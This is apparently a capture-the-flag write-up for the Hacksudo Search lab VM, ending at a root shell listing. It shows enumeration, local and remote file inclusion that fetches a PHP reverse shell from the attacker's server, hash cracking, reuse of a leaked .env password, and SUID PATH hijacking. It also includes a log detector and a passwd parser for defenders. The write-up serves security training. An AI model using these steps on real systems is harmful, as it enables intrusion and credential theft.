Hacksudo Search
Identifying the target host's IP address
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Hacksudo_Search]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:11 1 60 Unknown vendor
192.168.56.100 08:00:27:0d:63:f0 1 60 PCS Systemtechnik GmbH
192.168.56.155 08:00:27:a4:b5:00 1 60 PCS Systemtechnik GmbH
Using netdiscover, which ships with Kali Linux, the target host's IP address is identified as 192.168.56.155.
Nmap scan
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Hacksudo_Search]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.155 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-04 22:25 EST
Nmap scan report for bogon (192.168.56.155)
Host is up (0.00020s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 7b:44:7c:da:fb:e5:e6:1d:76:33:eb:fa:c0:dd:77:44 (RSA)
| 256 13:2d:45:07:32:83:13:eb:4e:a1:20:f4:06:ba:26:8a (ECDSA)
|_ 256 21:a1:86:47:07:1b:df:b2:70:7e:d9:30:e3:29:c2:e7 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: HacksudoSearch
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:A4:B5:00 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.52 seconds
Getting a shell
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Hacksudo_Search]
└─$ curl http://192.168.56.155/robots.txt
/* find me * im number 1 search engine .
just joking :)
www.hacksudo.com
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Hacksudo_Search]
└─$ nikto -h http://192.168.56.155
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.155
+ Target Hostname: 192.168.56.155
+ Target Port: 80
+ Start Time: 2023-01-04 22:28:38 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OSVDB-630: The web server may reveal its internal or real IP in the Location header via a request to /images over HTTP/1.0. The value is "127.0.0.1".
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-3268: /account/: Directory indexing found.
+ OSVDB-3092: /account/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ /.env: .env file found. The .env file may contain credentials.
+ 7915 requests: 0 error(s) and 9 item(s) reported on remote host
+ End Time: 2023-01-04 22:29:37 (GMT-5) (59 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
*********************************************************************
Portions of the server's headers (Apache/2.4.38) are not in
the Nikto 2.1.6 database or are newer than the known string. Would you like
to submit this information (*no server specific data*) to CIRT.net
for a Nikto update (or you may email to [email protected]) (y/n)?
nikto found the /account directory. Browsing it shows a few PHP files, but requesting them returns blank pages (no error is raised).
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Hacksudo_Search]
└─$ gobuster dir -u http://192.168.56.155 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.155
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.4
[+] Timeout: 10s
===============================================================
2023/01/04 22:31:05 Starting gobuster in directory enumeration mode
===============================================================
/images (Status: 301) [Size: 317] [--> http://192.168.56.155/images/]
/assets (Status: 301) [Size: 317] [--> http://192.168.56.155/assets/]
/account (Status: 301) [Size: 318] [--> http://192.168.56.155/account/]
/javascript (Status: 301) [Size: 321] [--> http://192.168.56.155/javascript/]
/LICENSE (Status: 200) [Size: 1074]
/server-status (Status: 403) [Size: 279]
Progress: 219019 / 220561 (99.30%)
===============================================================
2023/01/04 22:31:46 Finished
===============================================================
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Hacksudo_Search]
└─$ gobuster dir -u http://192.168.56.155 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.sh,.txt,.js
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.155
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.4
[+] Extensions: php,html,sh,txt,js
[+] Timeout: 10s
===============================================================
2023/01/04 22:31:58 Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 279]
/index.php (Status: 200) [Size: 715]
/images (Status: 301) [Size: 317] [--> http://192.168.56.155/images/]
/.html (Status: 403) [Size: 279]
/search.php (Status: 200) [Size: 165]
/submit.php (Status: 200) [Size: 165]
/assets (Status: 301) [Size: 317] [--> http://192.168.56.155/assets/]
/account (Status: 301) [Size: 318] [--> http://192.168.56.155/account/]
/javascript (Status: 301) [Size: 321] [--> http://192.168.56.155/javascript/]
/robots.txt (Status: 200) [Size: 75]
/LICENSE (Status: 200) [Size: 1074]
/search1.php (Status: 200) [Size: 2918]
/.html (Status: 403) [Size: 279]
/.php (Status: 403) [Size: 279]
/server-status (Status: 403) [Size: 279]
/crawler.php (Status: 500) [Size: 0]
Progress: 1321241 / 1323366 (99.84%)
===============================================================
2023/01/04 22:36:46 Finished
===============================================================
The scan turned up search1.php, whose Contact link points at ?FUZZ=contact.php; the author is clearly hinting that the parameter name has to be fuzzed.
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Hacksudo_Search]
└─$ wfuzz -c -u http://192.168.56.155/search1.php?FUZZ=../../../../../../../etc/passwd -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hw 288
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://192.168.56.155/search1.php?FUZZ=../../../../../../../etc/passwd
Total requests: 220560
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000001129: 200 143 L 260 W 3797 Ch "me"
000006096: 200 137 L 288 W 2918 Ch "886"
Total time: 0
Processed Requests: 6102
Filtered Requests: 6101
Requests/sec.: 0
Fuzzing reveals the parameter name is me. Verify it manually:
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Hacksudo_Search]
└─$ curl http://192.168.56.155/search1.php?me=../../../../../../../etc/passwd
<html>
<head>
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
<style>
* {box-sizing: border-box;}
body {
margin: 0;
font-family: Arial, Helvetica, sans-serif;
}
.topnav {
overflow: hidden;
background-color: #e9e9e9;
}
.topnav a {
float: left;
display: block;
color: black;
text-align: center;
padding: 14px 16px;
text-decoration: none;
font-size: 17px;
}
.topnav a:hover {
background-color: #ddd;
color: black;
}
.topnav a.active {
background-color: #2196F3;
color: white;
}
.topnav .search-container {
float: right;
}
.topnav input[type=text] {
padding: 6px;
margin-top: 8px;
font-size: 17px;
border: none;
}
.topnav .search-container button {
float: right;
padding: 6px 10px;
margin-top: 8px;
margin-right: 16px;
background: #ddd;
font-size: 17px;
border: none;
cursor: pointer;
}
.topnav .search-container button:hover {
background: #ccc;
}
@media screen and (max-width: 600px) {
.topnav .search-container {
float: none;
}
.topnav a, .topnav input[type=text], .topnav .search-container button {
float: none;
display: block;
text-align: left;
width: 100%;
margin: 0;
padding: 14px;
}
.topnav input[type=text] {
border: 1px solid #ccc;
}
}
</style>
<title>
Hacksudo::search
</title>
</head>
<body style="background-color:Navy;">
<!-- find me @hacksudo.com/contact @fuzzing always best option :) -->
<font color=white>
<div class="topnav">
<a class="active" href="?find=home.php">Home</a>
<a href="?Me=about.php">About</a>
<a href="?FUZZ=contact.php">Contact</a>
<div class="search-container">
<form action="submit.php">
<input type="text" placeholder="Search.." name="search">
<button type="submit"><i class="fa fa-search"></i></button>
</form>
</div>
</div>
<div style="padding-left:16px">
<h1><font color=red>HackSudo</font> Search box</h1>
<p>JumpStation The web crawler with Google</p>
</div>
root:x:0:0:root:/root:/bin/bash
daemon:*:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:*:2:2:bin:/bin:/usr/sbin/nologin
sys:*:3:3:sys:/dev:/usr/sbin/nologin
sync:*:4:65534:sync:/bin:/bin/sync
games:*:5:60:games:/usr/games:/usr/sbin/nologin
man:*:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:*:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:*:8:8:mail:/var/mail:/usr/sbin/nologin
news:*:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:*:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:*:13:13:proxy:/bin:/usr/sbin/nologin
www-data:*:33:33:www-data:/var/www:/usr/sbin/nologin
backup:*:34:34:backup:/var/backups:/usr/sbin/nologin
list:*:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:*:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:*:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:*:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:*:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:*:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:*:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:*:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
hacksudo:x:1000:1000:hacksudo,,,:/home/hacksudo:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
mysql:x:106:112:MySQL Server,,,:/nonexistent:/bin/false
monali:x:1001:1001:,,,:/home/monali:/bin/bash
john:x:1002:1002:,,,:/home/john:/bin/bash
search:x:1003:1003:,,,:/home/search:/bin/bash
</form>
</font>
<font color=red><h2><marquee> <a href="https://www.hacksudo.com/">Visit --> www.hacksudo.com</marquee></h2></a>
</font>
</div>
</body>
</html>
The contents of /etc/passwd were read successfully, and three user names are visible:
monali
john
search
Check whether a private key file exists:
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Hacksudo_Search]
└─$ curl http://192.168.56.155/search1.php?me=../../../../../../../home/search/john/id_rsa
No SSH private key was found for any of the three users. Next, check for a remote file inclusion vulnerability: write an arbitrary text file on Kali Linux and serve it over HTTP (using Python).
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Hacksudo_Search]
└─$ cat test.txt
haaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Hacksudo_Search]
└─$ curl http://192.168.56.155/search1.php?me=http://192.168.56.146:8000/test.txt
<html>
<head>
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
<style>
* {box-sizing: border-box;}
body {
margin: 0;
font-family: Arial, Helvetica, sans-serif;
}
.topnav {
overflow: hidden;
background-color: #e9e9e9;
}
.topnav a {
float: left;
display: block;
color: black;
text-align: center;
padding: 14px 16px;
text-decoration: none;
font-size: 17px;
}
.topnav a:hover {
background-color: #ddd;
color: black;
}
.topnav a.active {
background-color: #2196F3;
color: white;
}
.topnav .search-container {
float: right;
}
.topnav input[type=text] {
padding: 6px;
margin-top: 8px;
font-size: 17px;
border: none;
}
.topnav .search-container button {
float: right;
padding: 6px 10px;
margin-top: 8px;
margin-right: 16px;
background: #ddd;
font-size: 17px;
border: none;
cursor: pointer;
}
.topnav .search-container button:hover {
background: #ccc;
}
@media screen and (max-width: 600px) {
.topnav .search-container {
float: none;
}
.topnav a, .topnav input[type=text], .topnav .search-container button {
float: none;
display: block;
text-align: left;
width: 100%;
margin: 0;
padding: 14px;
}
.topnav input[type=text] {
border: 1px solid #ccc;
}
}
</style>
<title>
Hacksudo::search
</title>
</head>
<body style="background-color:Navy;">
<!-- find me @hacksudo.com/contact @fuzzing always best option :) -->
<font color=white>
<div class="topnav">
<a class="active" href="?find=home.php">Home</a>
<a href="?Me=about.php">About</a>
<a href="?FUZZ=contact.php">Contact</a>
<div class="search-container">
<form action="submit.php">
<input type="text" placeholder="Search.." name="search">
<button type="submit"><i class="fa fa-search"></i></button>
</form>
</div>
</div>
<div style="padding-left:16px">
<h1><font color=red>HackSudo</font> Search box</h1>
<p>JumpStation The web crawler with Google</p>
</div>
haaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
</form>
</font>
<font color=red><h2><marquee> <a href="https://www.hacksudo.com/">Visit --> www.hacksudo.com</marquee></h2></a>
</font>
</div>
</body>
</html>
A remote file inclusion vulnerability exists.
Now copy a shell.php onto Kali Linux and request it through the inclusion:
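From the defender's side, the two requests that confirmed the LFI and the RFI above leave a clear trace in the web server's access log. The following Python detector is an added example, not part of the original walkthrough; the log lines are constructed samples that mirror this page's curl requests, and the parameter-classification rules (traversal sequences, URL schemes and PHP stream wrappers) are my own.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed Apache access-log lines mirroring the requests sent in this
# walkthrough; sample data, not the target's real logs.
SAMPLE_LOG = """\
192.168.56.146 - - [04/Jan/2023:22:40:01 -0500] "GET /search1.php?me=../../../../../../../etc/passwd HTTP/1.1" 200 3797 "-" "curl/7.85.0"
192.168.56.146 - - [04/Jan/2023:22:52:13 -0500] "GET /search1.php?me=http://192.168.56.146:8000/test.txt HTTP/1.1" 200 2963 "-" "curl/7.85.0"
192.168.56.146 - - [04/Jan/2023:22:59:45 -0500] "GET /search1.php?me=http%3A%2F%2F192.168.56.146%3A8000%2Fshell.php HTTP/1.1" 200 2918 "-" "curl/7.85.0"
192.168.56.1 - - [04/Jan/2023:23:00:02 -0500] "GET /search1.php?find=home.php HTTP/1.1" 200 2918 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# "../" or "..\" anywhere, or an absolute path into sensitive system directories
TRAVERSAL_RE = re.compile(r'\.\.[/\\]|^/(?:etc|proc|root|home|var)/', re.I)
# URL schemes and PHP stream wrappers that turn an include into a remote fetch
REMOTE_RE = re.compile(r'^(?:https?|ftp)://|^(?:php|phar|expect|data):', re.I)


def decode_param(value, rounds=2):
    """URL-decode repeatedly so %2E%2E%2F and double-encoded forms are caught."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify_param(name, value):
    """Return the finding kind for one query parameter, or None if benign."""
    v = decode_param(value)
    if REMOTE_RE.search(v):
        return 'rfi-remote-url'
    if TRAVERSAL_RE.search(v):
        return 'lfi-traversal'
    return None


def scan_log(text):
    """Return one dict per suspicious request found in Apache combined-log text."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group('target'))
        # parse_qsl already decodes one layer; decode_param handles the rest
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            kind = classify_param(name, value)
            if kind:
                findings.append({
                    'ip': m.group('ip'), 'status': int(m.group('status')),
                    'path': parts.path, 'param': name, 'kind': kind,
                    'value': decode_param(value),
                })
    return findings
```

A 200 response to a request flagged as lfi-traversal (as in the first sample line, 3797 bytes against the page's normal 2918) is the strongest signal that the inclusion actually succeeded.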
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Hacksudo_Search]
└─$ cp ~/Desktop/Toolsets/PHPShell/php-reverse-shell.php .
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Hacksudo_Search]
└─$ ls
nmap_full_scan php-reverse-shell.php test.txt
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Hacksudo_Search]
└─$ mv php-reverse-shell.php shell.php
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Hacksudo_Search]
└─$ vim shell.php
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Hacksudo_Search]
└─$ curl http://192.168.56.155/search1.php?me=http://192.168.56.146:8000/shell.php
The reverse shell was received successfully on Kali Linux:
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Hacksudo_Search]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.146] from (UNKNOWN) [192.168.56.155] 54450
Linux HacksudoSearch 4.19.0-14-amd64 #1 SMP Debian 4.19.171-2 (2021-01-30) x86_64 GNU/Linux
23:01:34 up 44 min, 0 users, load average: 0.00, 0.03, 0.45
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ which python
/usr/bin/python
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@HacksudoSearch:/$
Privilege escalation
Upload the linpeas.sh script to /tmp on the target, make it executable and run it. Its output reveals a /etc/passwd.bak file:
www-data@HacksudoSearch:/tmp$ cat /etc/passwd.bak
cat /etc/passwd.bak
root:$6$cjOge1p.SSVNb4gP$.W3FeKVb7iP1q5wbFMcLM5CSu0xBxgJTH0G69fxSRGHzd34wjWyUONM1tIsIG0wN4oOWriHTOL9f9xS4Qza9E/:0:0:root:/root:/bin/bash
daemon:*:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:*:2:2:bin:/bin:/usr/sbin/nologin
sys:*:3:3:sys:/dev:/usr/sbin/nologin
sync:*:4:65534:sync:/bin:/bin/sync
games:*:5:60:games:/usr/games:/usr/sbin/nologin
man:*:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:*:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:*:8:8:mail:/var/mail:/usr/sbin/nologin
news:*:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:*:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:*:13:13:proxy:/bin:/usr/sbin/nologin
www-data:*:33:33:www-data:/var/www:/usr/sbin/nologin
backup:*:34:34:backup:/var/backups:/usr/sbin/nologin
list:*:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:*:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:*:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:*:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:*:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:*:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:*:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:*:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
hacksudo:$6$nh9tUD84T7Bfrm8u$KYH9z3KrUQKcM8XgYrMOv4mSUDEnQ0n8P1b/Kup5KmM0hTtgVtntnpcRUQImLCw50ADm.sJkzZ6Ph3XlA/aiR.:1000:1000:hacksudo,,,:/home/hacksudo:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
mysql:x:106:112:MySQL Server,,,:/nonexistent:/bin/false
monali:x:1001:1001:,,,:/home/monali:/bin/bash
john:x:1002:1002:,,,:/home/john:/bin/bash
It contains hacksudo's password hash.
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Hacksudo_Search]
└─$ vim hacksudo_hashes
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Hacksudo_Search]
└─$ john hacksudo_hashes -w /usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 2 OpenMP threads
Proceeding with wordlist:/usr/share/john/password.lst
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:01 DONE (2023-01-04 23:14) 0g/s 1837p/s 1837c/s 1837C/s jussi..sss
Session completed.
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Hacksudo_Search]
└─$ john --show hacksudo_hashes
0 password hashes cracked, 1 left
The hacksudo hash was copied into a file named hacksudo_hashes and given to john, but this failed (note that the output of this first run shows "Proceeding with wordlist:/usr/share/john/password.lst", the default list, so rockyou.txt was not actually used).
As an alternative, the hacksudo line from /etc/passwd and the corresponding line from /etc/passwd.bak (which is effectively a shadow file) were each saved to their own file, merged with unshadow, and john then cracked the result successfully:
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Hacksudo_Search]
└─$ vim passwd_file
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Hacksudo_Search]
└─$ vim shadow_file
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Hacksudo_Search]
└─$ unshadow passwd_file shadow_file > enc.txt
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Hacksudo_Search]
└─$ cat enc.txt
hacksudo:$6$nh9tUD84T7Bfrm8u$KYH9z3KrUQKcM8XgYrMOv4mSUDEnQ0n8P1b/Kup5KmM0hTtgVtntnpcRUQImLCw50ADm.sJkzZ6Ph3XlA/aiR.:1000:1000:hacksudo,,,:/home/hacksudo:/bin/bash
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Hacksudo_Search]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt enc.txt
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
redhat (hacksudo)
1g 0:00:00:18 DONE (2023-01-04 23:19) 0.05370g/s 2653p/s 2653c/s 2653C/s truckin..morgan6
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Hacksudo_Search]
└─$ cat passwd_file
hacksudo:x:1000:1000:hacksudo,,,:/home/hacksudo:/bin/bash
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Hacksudo_Search]
└─$ cat shadow_file
hacksudo:$6$nh9tUD84T7Bfrm8u$KYH9z3KrUQKcM8XgYrMOv4mSUDEnQ0n8P1b/Kup5KmM0hTtgVtntnpcRUQImLCw50ADm.sJkzZ6Ph3XlA/aiR.:1000:1000:hacksudo,,,:/home/hacksudo:/bin/bash
But switching to that user fails:
www-data@HacksudoSearch:/tmp$ su - hacksudo
su - hacksudo
Password: redhat
id
id
su: Authentication failure
www-data@HacksudoSearch:/tmp$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@HacksudoSearch:/tmp$ su - hacksudo
su - hacksudo
Password: redhat
su: Authentication failure
www-data@HacksudoSearch:/tmp$
So this password is wrong.
In fact the linpeas.sh output already contained the database password:
══════════╣ Analyzing Env Files (limit 70)
-rw-r--r-- 1 www-data www-data 306 Apr 15 2021 /var/www/html/.env
APP_name=HackSudoSearch
APP_ENV=local
APP_key=base64:aGFja3N1ZG8gaGVscCB5b3UgdG8gbGVhcm4gQ1RGICwgY29udGFjdCB1cyB3d3cuaGFja3N1ZG8uY29tL2NvbnRhY3QK
APP_DEBUG=false
APP_URL=http://localhost
LOG_CHANNEL=stack
DB_CONNECTION=mysql
DB_HOST=127.0.0.1
DB_PORT=3306
DB_USERNAME=hiraman
DB_PASSWORD=MyD4dSuperH3r0!
Try this password for hacksudo:
www-data@HacksudoSearch:/tmp$ su - hacksudo
su - hacksudo
Password: MyD4dSuperH3r0!
hacksudo@HacksudoSearch:~$
Ugh, so the password john cracked from the shadow file was wrong after all. Since john did verify "redhat" against the hash stored in /etc/passwd.bak, that backup simply holds an outdated hash; the live /etc/shadow entry for hacksudo is different.
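The three passwd-file steps above (enumerating login-capable users from /etc/passwd, the linpeas finding that /etc/passwd.bak carries real hashes, and the unshadow merge) fit in one small parser. This is an added example, not the walkthrough's own tooling: the passwd_file, shadow_file and passwd.bak data are copied from the page, while CURRENT_SHADOW is a hypothetical live /etc/shadow line with a placeholder hash, since the page never shows it.

```python
import re

# Constructed from the walkthrough: passwd_file, shadow_file and a subset of
# /etc/passwd.bak, with the hashes exactly as shown on the page.
PASSWD_FILE = "hacksudo:x:1000:1000:hacksudo,,,:/home/hacksudo:/bin/bash\n"
SHADOW_FILE = "hacksudo:$6$nh9tUD84T7Bfrm8u$KYH9z3KrUQKcM8XgYrMOv4mSUDEnQ0n8P1b/Kup5KmM0hTtgVtntnpcRUQImLCw50ADm.sJkzZ6Ph3XlA/aiR.:1000:1000:hacksudo,,,:/home/hacksudo:/bin/bash\n"
PASSWD_BAK = """\
root:$6$cjOge1p.SSVNb4gP$.W3FeKVb7iP1q5wbFMcLM5CSu0xBxgJTH0G69fxSRGHzd34wjWyUONM1tIsIG0wN4oOWriHTOL9f9xS4Qza9E/:0:0:root:/root:/bin/bash
daemon:*:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:*:33:33:www-data:/var/www:/usr/sbin/nologin
hacksudo:$6$nh9tUD84T7Bfrm8u$KYH9z3KrUQKcM8XgYrMOv4mSUDEnQ0n8P1b/Kup5KmM0hTtgVtntnpcRUQImLCw50ADm.sJkzZ6Ph3XlA/aiR.:1000:1000:hacksudo,,,:/home/hacksudo:/bin/bash
mysql:x:106:112:MySQL Server,,,:/nonexistent:/bin/false
monali:x:1001:1001:,,,:/home/monali:/bin/bash
john:x:1002:1002:,,,:/home/john:/bin/bash
"""
# Hypothetical live /etc/shadow line (not on the page); the hash is an obvious
# placeholder standing in for whatever the real password hashes to.
CURRENT_SHADOW = "hacksudo:$6$PLACEHOLDERSALT$PLACEHOLDERHASH:18732:0:99999:7:::\n"

NOLOGIN_SHELLS = {'/usr/sbin/nologin', '/sbin/nologin', '/bin/false'}
HASH_RE = re.compile(r'^\$(?:1|2[abxy]?|5|6|y)\$')  # crypt(3) hash prefixes


def parse_entries(text):
    """Map user name -> field list for passwd- or shadow-format text."""
    entries = {}
    for line in text.splitlines():
        if not line.strip() or line.startswith('#'):
            continue
        fields = line.split(':')
        if len(fields) >= 2:
            entries[fields[0]] = fields
    return entries


def interactive_users(passwd_text):
    """Accounts with a real login shell (the user enumeration step)."""
    return [f[0] for f in parse_entries(passwd_text).values()
            if len(f) >= 7 and f[6] not in NOLOGIN_SHELLS]


def embedded_hashes(passwd_text):
    """Accounts whose password field holds a crypt hash instead of x/*/!,
    i.e. the linpeas finding on the world-readable /etc/passwd.bak."""
    return [f[0] for f in parse_entries(passwd_text).values()
            if HASH_RE.match(f[1])]


def unshadow(passwd_text, shadow_text):
    """Merge shadow hashes into passwd lines, as unshadow(8) does."""
    shadow = parse_entries(shadow_text)
    merged = []
    for fields in parse_entries(passwd_text).values():
        fields = list(fields)
        if fields[0] in shadow:
            fields[1] = shadow[fields[0]][1]
        merged.append(':'.join(fields))
    return '\n'.join(merged)


def stale_hashes(backup_text, current_text):
    """Users whose backup hash differs from the live one: cracking the backup
    (as with 'redhat') then yields a password that no longer opens the account."""
    backup, current = parse_entries(backup_text), parse_entries(current_text)
    return [u for u in backup if u in current and backup[u][1] != current[u][1]]
```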
hacksudo@HacksudoSearch:~$ find / -perm -4000 -type f 2>/dev/null
find / -perm -4000 -type f 2>/dev/null
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/pkexec
/usr/bin/chfn
/usr/bin/umount
/usr/bin/mount
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/su
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/home/hacksudo/search/tools/searchinstall
searchinstall has the SUID bit set.
hacksudo@HacksudoSearch:~/search$ cd tools
cd tools
hacksudo@HacksudoSearch:~/search/tools$ ls
ls
file searchinstall searchinstall.c
hacksudo@HacksudoSearch:~/search/tools$ cat searchinstall.c
cat searchinstall.c
#include<unistd.h>
void main()
{ setuid(0);
setgid(0);
system("install");
}
hacksudo@HacksudoSearch:~/search/tools$ echo '/bin/bash' > install
echo '/bin/bash' > install
hacksudo@HacksudoSearch:~/search/tools$ chmod 777 install
chmod 777 install
hacksudo@HacksudoSearch:~/search/tools$ export PATH=/home/hacksudo/search/tools:$PATH
<ools$ export PATH=/home/hacksudo/search/tools:$PATH
hacksudo@HacksudoSearch:~/search/tools$ ./searchinstall
./searchinstall
root@HacksudoSearch:~/search/tools# cd /root
cd /root
root@HacksudoSearch:/root# ls -alh
ls -alh
total 52K
